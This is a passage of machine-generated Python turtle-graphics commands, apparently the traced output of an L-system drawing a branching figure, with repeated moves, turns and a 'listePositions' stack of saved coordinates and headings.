pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(67.5) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(45.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((176.93,228.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.93,228.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((176.93,228.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((176.93,228.88)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((188.24,240.19)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((188.24,240.19)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((204.24,240.19), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.24,240.19)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((204.24,240.19), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.24,240.19)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((219.02,246.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((219.02,246.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((219.02,246.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((219.02,246.32)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((230.34,257.63), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.34,257.63)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 22.5), ((230.34,257.63), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.34,257.63)), setheading(45.0) ;
pu(), setposition((188.24,240.19)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((194.36,254.98), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.36,254.98)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((194.36,254.98), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((194.36,254.98)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((205.68,266.29), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.68,266.29)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((205.68,266.29), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((205.68,266.29)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((220.46,272.41), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.46,272.41)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((188.24,240.19), 45.0), ((220.46,272.41), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((220.46,272.41)), setheading(22.5) ;
pu(), setposition((188.24,240.19)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((203.02,246.32), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.02,246.32)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((203.02,246.32), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.02,246.32)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((217.80,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((217.80,252.44)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((232.59,246.32), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((232.59,246.32)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((232.59,246.32), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((232.59,246.32)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((248.59,246.32), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.59,246.32)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((248.59,246.32), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.59,246.32)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((263.37,252.44), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((263.37,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 0.0), ((263.37,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((263.37,252.44)), setheading(22.5) ;
pu(), setposition((217.80,252.44)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((229.12,263.75), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.12,263.75)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((229.12,263.75), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.12,263.75)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((243.90,269.88), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.90,269.88)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((243.90,269.88), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.90,269.88)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((259.90,269.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.90,269.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((217.80,252.44), 22.5), ((259.90,269.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.90,269.88)), setheading(0.0) ;
pu(), setposition((217.80,252.44)), setheading(22.5) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(67.5) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(45.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((171.74,232.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,232.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((171.74,232.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,232.35)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((203.95,264.57), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.95,264.57)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((203.95,264.57), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((203.95,264.57)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((210.08,279.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.08,279.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((210.08,279.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((210.08,279.35)), setheading(67.5) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,277.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,277.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,277.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,277.91)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((195.29,289.23), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,289.23)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((195.29,289.23), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
